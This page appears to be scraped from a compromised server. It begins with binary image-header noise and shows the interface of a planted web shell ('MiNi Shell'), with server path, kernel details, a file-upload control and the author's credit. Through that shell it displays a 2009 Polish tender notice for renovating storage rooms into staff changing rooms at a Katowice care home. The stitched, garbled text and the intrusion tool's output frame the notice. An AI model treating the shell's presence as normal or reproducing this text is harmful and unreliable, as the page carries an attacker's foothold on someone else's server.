JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090123/26871-N-2009.html

<p class="kh_header"><b>Katowice: Dostosowanie pomieszczeń magazynów gospodarczych na szatnie dla pracowników</b><br>
<b>Numer ogłoszenia: 26871 - 2009; data zamieszczenia: 23.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej ZACISZE , ul. Traktorzystów 42, 40-695 Katowice, woj. śląskie, tel. 0-32 2025432, faks 0-32 2524860.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.biuletyn.abip.pl/dpszacisze</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostosowanie pomieszczeń magazynów gospodarczych na szatnie dla pracowników.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia w niniejszym postępowaniu są roboty remontowo-budowlane dotyczące:
Dostosowania pomieszczeń magazynów gospodarczych na szatnię                   
   dla pracowników.
   W skład w/w robót należy między innymi:
1. Przebudowa pomieszczeń piwnicznych na szatnię dla pracowników z                  licowaniem ścian  i posadzki płytkami ceramicznymi.Wyrównanie tynków na suficie z malowaniem farbami emulsyjnymi.
2.Wykucie otworu w ścianie i zabudowa drzwi w przejściu do pomieszczenia łaźni. Licowanie ścian i podłogi w pomieszczeniu łaźni  płytkami ceramicznymi.
3.Wykonanie natrysków i pomieszczenia W.C. 
4.Dostosowanie instalacji wodnej i odpływu do kanalizacji istniejącej  w kotłowni.
5.Przebudowa przejścia z pomieszczenia łaźni na zewnątrz budynku, licowanie ścian i podłogi płytkami ceramicznymi.
6.Wykucie otworu na drzwi w ścianie zewnętrznej budynku i montaż drzwi.
7.Dostosowanie wyjścia z budynku do istniejących schodów - wyjście z kotłowni.
8.Dostosowanie pomieszczenia,magazyn sprzętu kuchennego,na magazyn    
  do dezynsekcji, mycia i przechowywania jaj wraz z zabudową instalacji        
   wodnej z odpływem wody do instalacji odpływowej kotłowni.
9.Parter - remont pomieszczenia szatni pracowników kuchni wraz z     
   modernizacją natrysku i pomieszczenia W.C.
10.Wszystkie pomieszczenia remontowe w piwnicy D.P.S. zostaną wyposażone       
    w grzejniki C.O. zgodnie z dokumentacją.
11. Instalację elektryczną wykonać należy zgodnie z normami technicznymi.    
     Materiały elektryczne i budowlane  muszą posiadać Specyfikację Techniczną   
     oraz certyfikaty na znak bezpieczeństwa.
12.Wykonawca robót jest odpowiedzialny za jakość wykonania  robót oraz 
zgodność z dokumentacją projektową, poleceniami nadzoru inwestorskiego            
 i autorskiego zgodnie z art. 22,23 i art.28 ustawy Prawo Budowlane.  
 W w.w pomieszczeniach należy wykonać nową instalację elektryczną.
Uwaga
Wizja lokalna Domu od poniedziałku do piątku w godzinach od 8:00 do 14:00..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.52.10-2, 45.00.00.00-7, 45.21.13.10-5, 45.11.10.00-8, 45.21.22.30-7, 45.31.00.00-3, 45.21.34.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium.
     Ustala się wadium dla całości przedmiotu zamówienia w wysokości:   
      3 962,37zł, słownie: trzytysiącedziewięćsetsześćdziesiątdwazłotych 37 groszy.

Wykonawca wnosi wadium w wybranej przez siebie wymienionej poniżej formie:
- w pieniądzu- przelewem na rachunek bankowy: 

02 1050 1214 1000 0022 9013 2824 z adnotacją- wadium na dostosowanie pomieszczeń magazynów gospodarczych na szatnie dla pracowników ,

- w poręczeniach bankowych lub poręczeniach Spółdzielczej Kasy Oszczędnościowo-   
  Kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym,
- w gwarancjach bankowych,
- w gwarancjach ubezpieczeniowych,
- w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt. 2 
   ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju  
   Przedsiębiorczości -Dz. U. Nr 109 poz. 1158 z póz. zm.,
    w terminie do  dnia 17.02.2009 r. do godziny 8:00  
Przy czym za termin wniesienia wadium w formie przelewu pieniężnego, przyjmuje się termin uznania na rachunku zamawiającego.
W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte 
w art. 45 i 46.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy:
  1.1  Posiadający uprawnienia do wykonywania określonej działalności lub czynności   
         jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
  
 1.2  Posiadający niezbędną wiedzę i doświadczenie oraz dysponujący potencjałem    
           technicznym    i osobami zdolnymi do wykonania zamówienia lub którzy, przedstawią pisemne  zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób  zdolnych  do wykonania zamówienia. 
        Wykonawca musi wykazać, iż w ostatnich 5 latach przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie, wykonał minimum 3 porównywalne roboty budowlane polegające na:    
        wykonaniu robót ogólnobudowlanych  (na budynkach mieszkalnych, bądź zamieszkania zbiorowego, bądź w budynkach użyteczności publicznej) w budynkach.
 1.3  Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie    
         zamówienia.
  1.4  Nie podlegający wykluczeniu z postępowania o udzielenie zamówienia.
      2.   Z ubiegania się o zamówienie publiczne wyklucza się wykonawców, którzy:
  2.1  Nie spełniają warunków udziału w postępowaniu o zam. publiczne. z art. 22 PZP opisanych w podpunktach 1.1 do 1.4.
  2.2  Podlegają wykluczeniu z postępowania na podst. art. 24 ust. Prawa zamówień publicznych.
  2.3  Wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi
 w dokonywaniu tych czynności, chyba, że udział tych wykonawców w postępowaniu 
 nie utrudnia uczciwej konkurencji.
  2.4  Złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania.
  2.5  Nie złożyli oświadczenia o spełnieniu warunków udziału w postępowaniu lub   
         dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty zawierają błędy z zastrzeżeniem art. 26 ust. 3 PZP.
2.6	Nie wnieśli wadium, w tym również na przedłużony okres związania ofertą lub   nie zgodzili się na przedłużenie okresu związania ofertą. 
    3.   Zamawiający odrzuca ofertę jeżeli:
  3.1   Jest niezgodna z ustawą.
  3.2   Jej treść nie odpowiada treści Specyfikacji Istotnych Warunków Zamówienia 
          z zastrzeżeniem art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych.
  3.3   Jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów 
          o zwalczaniu nieuczciwej konkurencji.
  3.4   Zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia.
  3.5   Została złożona przez wykonawcę wykluczonego z udziału w postępowaniu 
          o udzielenie zamówienia.
  3.6   Zawiera błędy w obliczeniu ceny.
  3.7   Wykonawca w terminie 3 dni od dnia wręczenia zawiadomienia nie zgodził się na poprawienie omyłki o której mowa w art. 87 ust. 2 pkt. 3 PZP.
  3.8   Jest nie ważna na podstawie odrębnych przepisów.
   4.   Ofertę wykonawcy wykluczonego uważa się za odrzuconą.
   5.   Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia-nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na ofertę składają się następujące dokumenty i załączniki:
  a)  Formularz ofertowy - wypełniony i podpisany przez wykonawcę.
  b)  Zaakceptowany wzór umowy.
  c)  Kosztorys ofertowy.
2.   W celu potwierdzenia, że wykonawca posiada uprawnienia do wykonywania   
      określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie 
      art. 24 PZP składa następujące dokumenty:
2.1 Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do   
       ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
 2.2   Dokumenty potwierdzające posiadanie uprawnień-pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych.
2.3	Aktualne zaświadczenie właściwego Naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z zapłaceniem podatku, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenia,że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
2.4Oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu z art.24 ustawy Prawa zamówień publicznych.
2.5 Oświadczenie wykonawcy o spełnieniu warunków udziału w postępowania z art.22 ustawy Prawa zamówień publicznych.
 3.    W celu potwierdzenia spełnienia warunków posiadania niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi       
 do wykonywania zamówienia należy złożyć następujące dokumenty:
3.1	Wykaz wykonanych robót budowlanych w okresie ostatnich 5 lat przed wszczęciem niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, odpowiadających swoim rodzajem i wartością robót budowlanych stanowiących przedmiot zamówienia z podaniem ich wartości oraz daty i miejsca wykonania wraz z dokumentami potwierdzającymi, że roboty te zostały wykonane należycie.
3.2	Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował wykonawca oraz pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń jeżeli w wykazie tym wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował.
3.3  Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą  uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia,a także zakresów wykonywanych przez nie czynności oraz pisemne zobowiązania innych  podmiotów do udostępnienia osób zdolnych do wykonania zamówienia jeżeli w wykazie tym wykonawca wskazał osoby, którymi będzie dysponował. 
3.4	 Dokumenty stwierdzające, że osoby które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. Należy dołączyć poświadczone za zgodność z oryginałem kserokopie uprawnień budowlanych, zaświadczeń o przynależności do Okręgowej Izby Inżynierów, itp.
4.   Wykonawca zamieszkały poza terytorium Rzeczpospolitej Polskiej.
      Wykonawca, który ma siedzibę lub miejsce zamieszkania poza terytorium    
       Rzeczypospolitej Polskiej zamiast dokumentów o których mowa punkcie 2.1, 2.3 składa dokument lub dokumenty w formie jak określono w par. 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów jakich może żądać zamawiający od wykonawcy oraz form w jakich dokumenty mogą być składane (Dz.u. nr 87 poz. 605 z późn. zm.)
  5.   Dokumenty wymagane w przypadku składania oferty wspólnej:
  5.1  Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, 
          w takim przypadku dla ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy.
   Oferta winna zawierać:
   Oświadczenia i dokumenty opisane w pkt. 2.1, 2.2, 2.3, 2.4 i 2.5 dla każdego partnera z osobna, pozostałe dokumenty składane są wspólne.
   6.    Postanowienia dotyczące składanych dokumentów:
  6.1   Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub   
          kserokopii potwierdzonych za zgodność  przez wykonawcę lub osobę-osoby   
          uprawnione do podpisania oferty z dopiskiem -za zgodność z oryginałem.
  6.2   Dokumenty sporządzone w języku obcym są składane w języku polskim    
          poświadczone przez wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 80</li>
<li>2 - Doświadczenie w wykonywaniu robót o podobnym charakterze - 20</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.biuletyn.abip.pl/dpszacisze.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej Zacisze
40-695 Katowice
ul. Traktorzystów 42.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.02.2009 godzina 08:30, miejsce: Dom Pomocy Społecznej Zacisze
40-695 Katowice
ul. Traktorzystów 42
pokój nr 5.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com